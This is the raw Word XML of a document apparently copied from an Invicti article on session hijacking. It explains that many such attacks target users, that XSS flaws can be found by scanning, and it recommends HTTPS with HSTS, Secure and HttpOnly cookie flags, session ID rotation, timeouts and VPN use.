      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB53246" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:spacing w:after="0"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bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11566852"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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>How to detect session hijacking?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECD0CE"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Most session hijacking attacks target the user (for example, the trojan-based attacks and the man-in-the-middle attacks) and have nothing to do with the web application. These attacks can only be detected by monitoring user computers and user connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A133F76"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However, cross-site scripting vulnerabilities can also make session hijacking possible and they are web vulnerabilities that you can detect by scanning your web applications.</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:anchor="detect"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 Read more about how to detect and fix XSS vulnerabilities here.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F76566D"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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How to prevent session hijacking attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE7528"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To help prevent session hijacking attacks as a web application developer or web server administrator, follow these recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641460A" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Enforce SSL/TLS (HTTPS) for all your pages, not just the login page. For example, use</w:t>
      </w:r>
      <w:hyperlink r:id="rId13"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 HTTP Strict Transport Security (HSTS)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> and</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00C67B4C">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t> set security flags for session cookies</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>). This will make it far more difficult to steal session cookies and perform MITM attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3128C48D" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Change the session ID immediately after a user logs in. Log out inactive users and invalidate session IDs after a specified timeout and before any important user actions. This way, attackers will have a very short window to use any stolen session ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040923AD" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Most web development frameworks provide secure session management mechanisms to help you avoid predictable session IDs and include functions to change IDs often. Using such built-in functionality is always much safer than trying to do your own session ID management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA5E24" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4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rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>To protect users from session hijacking attacks aimed directly at their computers and connections, promote the use of VPNs, especially for insecure connections, such as public Wi-Fi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DABEF1" w14:textId="77777777" w:rsidR="001258EF" w:rsidRPr="00C67B4C" w:rsidRDefault="001258EF" w:rsidP="00C67B4C"/>
    <w:sectPr w:rsidR="001258EF" w:rsidRPr="00C67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7B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EC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03EE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82C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DF6D75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5D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536990">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="693967177">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="191014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4C"/>
    <w:rsid w:val="001258EF"/>
    <w:rsid w:val="00694A08"/>
    <w:rsid w:val="00C67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0598"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF1FABEF-2D83-494D-B6E0-C0B24899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7B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67B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7B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4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67B4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7B4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67B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67B4C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C67B4C"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C67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67B4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67B4C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C67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18939">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="74514543">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="437256399">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="7612228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367565639">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2094082947">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E5E5E5"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="7037940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cti.com/learn/mitm-dns-spoofing-dns-cache-poisoning/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/http-strict-transport-security-hsts/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/mitm-ssl-hijacking/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/cross-site-scripting-x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icti.com/learn/mitm-ssl-stripping/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/reflected-xss-non-persistent-cross-site-script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Man-in-the-browser" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/cookie-hijacking/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/cookie-security-fl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cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-27T12:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-27T12:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>